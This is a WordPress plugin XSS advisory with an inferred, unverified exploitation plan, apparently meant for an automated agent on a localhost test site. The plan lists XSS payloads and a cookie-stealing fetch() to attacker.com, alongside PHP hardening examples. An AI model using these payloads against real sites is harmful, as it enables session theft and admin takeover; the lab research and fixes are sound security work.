CVE-2025-68863

iContact for Gravity Forms <= 1.3.2 - Reflected Cross-Site Scripting

Severity: medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.1
Patched in: Unpatched
Time to patch: N/A

Description

The iContact for Gravity Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.3.2
Published: February 5, 2026
Last updated: February 9, 2026
Affected plugin: gravity-forms-icontact

Research Plan
Status: Unverified

This research plan targets a Reflected Cross-Site Scripting (XSS) vulnerability in the iContact for Gravity Forms plugin (version <= 1.3.2).

Since source files are not provided, this plan is based on the vulnerability description and standard patterns found in Gravity Forms Add-ons. We will treat the exact vulnerable parameter as a target for discovery during the initial phase.


1. Vulnerability Summary

The vulnerability is a Reflected Cross-Site Scripting (XSS). It occurs because the plugin accepts user-controlled input via HTTP parameters (likely GET or POST) and reflects that input back into the HTML response without sufficient sanitization (e.g., sanitize_text_field) or output escaping (e.g., esc_html, esc_attr).

In the context of a Gravity Forms Add-on, this typically happens in the admin settings area where parameters used for tabs, pagination, or status messages are echoed back to the user.

2. Attack Vector Analysis

  • Endpoint: The most likely vulnerable endpoints are:
    1. The Add-on settings page: /wp-admin/admin.php?page=gf_settings&addon=iContact (or similar slug).
    2. The iContact feed list/edit page: /wp-admin/admin.php?page=gf_edit_forms&view=settings&subview=icontact.
    3. A wp_ajax_ or wp_ajax_nopriv_ action that returns an error message containing the input.
  • Vulnerable Parameter (Candidates): subview, view, id, message, s (search), or error.
  • Authentication: The attacker is unauthenticated (remote), but the victim must be a logged-in user (typically an Administrator) who clicks a malicious link prepared by the attacker.
  • Preconditions: The plugin "iContact for Gravity Forms" must be active. Gravity Forms (core) must also be active.

3. Code Flow (Inferred)

  1. Entry Point: A user accesses a URL containing a malicious parameter (e.g., ...&message=<script>alert(1)</script>).
  2. Plugin Processing: The plugin's admin page handler (likely extending GFAddOn) retrieves the parameter directly from $_GET or $_REQUEST.
  3. Vulnerable Sink: The code performs an action like:
    echo '<div class="updated"><p>' . $_GET['message'] . '</p></div>';
    or
    printf( __('Error: %s', 'gravity-forms-icontact'), $_GET['error'] );
  4. Rendering: The browser receives the unescaped script tags and executes them in the context of the victim's session.
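As an added example (not the plugin's own code, which is not available; the function names and the message table are hypothetical), the two inferred sinks above are shown next to a hardened rewrite that reflects no free text and escapes on output. The function_exists stubs only stand in for WordPress when the file is run outside it.

```php
<?php
// Added example, not the plugin's own code: the two inferred sinks from the
// code-flow section next to a hardened rewrite. Function names and the
// message table are hypothetical. The stubs below only exist so the file runs
// outside WordPress; inside WordPress the real esc_html()/esc_html__()/
// sanitize_key() are used instead.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
    function esc_html__( $text, $domain = 'default' ) {
        return esc_html( $text );
    }
    function sanitize_key( $key ) {
        return preg_replace( '/[^a-z0-9_\-]/', '', strtolower( (string) $key ) );
    }
}

// Vulnerable sink 1: the query-string value is concatenated into the HTML as-is.
function icontact_notice_vulnerable( array $get ) {
    return '<div class="updated"><p>' . $get['message'] . '</p></div>';
}

// Hardened: reflect no free text at all. Accept only a short key, look it up
// in a fixed table, and still escape the fixed string on output.
function icontact_notice_hardened( array $get ) {
    $messages = array(
        'saved'    => 'Settings saved.',
        'api_fail' => 'Could not reach the iContact API. Check your API key.',
    );
    $key = isset( $get['message'] ) ? sanitize_key( $get['message'] ) : '';
    if ( ! isset( $messages[ $key ] ) ) {
        return ''; // unknown key: render nothing instead of echoing the input
    }
    return '<div class="updated"><p>' . esc_html( $messages[ $key ] ) . '</p></div>';
}

// Hardened sink 2: both the translated format string and the interpolated
// value are escaped before they reach the page.
function icontact_error_hardened( $error ) {
    return sprintf( esc_html__( 'Error: %s', 'gravity-forms-icontact' ), esc_html( $error ) );
}

$input = array( 'message' => '<script>alert(1)</script>' ); // constructed test input
echo icontact_notice_vulnerable( $input ), "\n"; // tag passes through unchanged
echo icontact_notice_hardened( $input ), "\n";   // empty: key is not in the table
echo icontact_notice_hardened( array( 'message' => 'saved' ) ), "\n";
echo icontact_error_hardened( $input['message'] ), "\n"; // brackets entity-encoded
```

The key-lookup pattern also removes the need to decide between esc_html and esc_attr at the sink, since nothing attacker-controlled ever reaches the markup.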

4. Nonce Acquisition Strategy

Reflected XSS via GET parameters on admin pages often does not require a nonce because the vulnerability exists in the display logic of the page itself, which executes before or regardless of CSRF checks on actions.

However, if the reflection occurs inside a form or an AJAX response:

  1. Identify Script Localization: Search the page source for wp_localize_script data related to iContact.
  2. Variable Name: Look for a global object, likely gform_icontact_config or similar.
  3. Execution Agent Task:
    • Navigate to the iContact settings page: browser_navigate("/wp-admin/admin.php?page=gf_settings&addon=iContact").
    • Use browser_eval("window.gform_icontact_config") to inspect for nonces if needed for deeper interaction.

5. Exploitation Strategy

The agent should follow these steps to identify and exploit the reflection:

Step 1: Discovery of Reflection Points
Navigate to the plugin's admin pages and look for parameters that are reflected in the source.

  • URL 1: /wp-admin/admin.php?page=gf_settings&addon=iContact&test_param=REFLECTED_CANARY
  • URL 2: /wp-admin/admin.php?page=gf_edit_forms&view=settings&subview=icontact&test_param=REFLECTED_CANARY

Step 2: Construct the Payload
Once a reflected parameter is found, test for HTML injection:

  • Basic Alert: <script>alert(window.origin)</script>
  • Attribute Breakout: "><script>alert(1)</script>
  • Event Handler (if reflected in attribute): x" onmouseover="alert(1)

Step 3: Execute the Exploit (Simulated)
Since this is Reflected XSS, the "exploit" is the URL itself.

  • Target URL: http://localhost:8080/wp-admin/admin.php?page=gf_settings&addon=iContact&message=<script>alert(document.domain)</script>
  • Method: http_request (GET) or browser_navigate.

Step 4: Demonstrate Impact
To prove CVSS 6.1 (Medium), demonstrate the ability to read sensitive data (like nonces) or perform a background action (like creating a new admin).

  • Payload (Cookie Theft): <script>fetch('http://attacker.com/log?c=' + document.cookie)</script>
  • Payload (Nonce Extraction): <script>alert('Your REST nonce is: ' + wpApiSettings.nonce)</script>

6. Test Data Setup

  1. Install/Activate Plugins:
    • wp plugin install gravityforms --activate (ensure a version is available in the test environment).
    • wp plugin install gravity-forms-icontact --version 1.3.2 --activate
  2. Configure Admin User: Ensure a standard admin user exists (default admin / password).
  3. Mock Settings (If needed): Some admin pages only display if the plugin is "configured".
    • wp option update gf_icontact_settings '{"api_key":"12345"}' --format=json (Inferred option name).

7. Expected Results

  • The http_request or browser_navigate to the malicious URL should return a response body containing the raw, unescaped payload: <script>alert(document.domain)</script>.
  • In the browser, an alert box should trigger, or the browser_eval should confirm the script was added to the DOM.

8. Verification Steps

  1. Manual Source Check: Use curl or http_request to fetch the page with the canary in the parameter, then check whether the canary is reflected at all and, if so, whether it comes back escaped.
    # Search for the canary in the response
    grep "REFLECTED_CANARY" response.html
  2. Verify No Sanitization: Confirm that characters like < and > are not converted to &lt; and &gt;.
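An added helper (not from the advisory or the plugin) that implements this check over a saved response body and, going beyond the step above, also covers the attribute-breakout case from Step 2. It assumes the probe was sent as "<REFLECTED_CANARY> (a leading double quote, then the canary in angle brackets); the function name and the sample bodies are constructed for the demo.

```php
<?php
// Added example, not part of the advisory or the plugin: classifies how a
// canary sent as "<REFLECTED_CANARY> came back in a response body, which is the
// "no sanitization" check above plus the attribute-context case. The probe
// format, the function name and the sample bodies are all constructed.

function classify_reflection( string $body, string $canary = 'REFLECTED_CANARY' ): string {
    if ( strpos( $body, $canary ) === false ) {
        return 'absent';            // parameter is not reflected at all
    }
    if ( strpos( $body, '<' . $canary . '>' ) !== false ) {
        return 'raw';               // angle brackets survived: tag injection possible
    }
    $encoded = '&lt;' . $canary . '&gt;';
    if ( strpos( $body, '"' . $encoded ) !== false ) {
        return 'quote-unescaped';   // brackets encoded but the quote survived,
    }                               // which still breaks out of an attribute value
    if ( preg_match( '/(&quot;|&#0?34;)' . preg_quote( $encoded, '/' ) . '/', $body ) ) {
        return 'escaped';           // brackets and quote both entity-encoded
    }
    return 'partial';               // canary present in some other form: inspect by hand
}

// Constructed response bodies mimicking the possible outcomes.
$samples = array(
    'vulnerable' => '<div class="updated"><p>"<REFLECTED_CANARY></p></div>',
    'attr-risk'  => '<input value=""&lt;REFLECTED_CANARY&gt;">',
    'fixed'      => '<div class="updated"><p>&quot;&lt;REFLECTED_CANARY&gt;</p></div>',
    'not-echoed' => '<div class="updated"><p>Settings saved.</p></div>',
);
foreach ( $samples as $label => $html ) {
    // expected: raw, quote-unescaped, escaped, absent
    printf( "%-10s -> %s\n", $label, classify_reflection( $html ) );
}
```

Only 'escaped' or 'absent' is an acceptable result for a patched build; 'partial' means the encoding differs from what the helper expects and the response should be read manually.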

9. Alternative Approaches

If the settings page is not vulnerable, check the following:

  • Gravity Forms Feed URLs: Gravity Forms allows editing specific "feeds". The URL usually looks like ?page=gf_edit_forms&view=settings&subview=icontact&id=1. Test if the id parameter is reflected.
  • Bulk Actions: Check if a GET parameter like ids or processed is reflected after a bulk action is performed.
  • Error Strings: Trigger an error (e.g., invalid API key) and see if the invalid key is reflected in the error notice.
  • Frontend Shortcodes: Check if the plugin provides a shortcode that reflects attributes.
    • Search: grep -r "add_shortcode" .
    • Test: [icontact_shortcode param="<script>alert(1)</script>"] (if it exists).
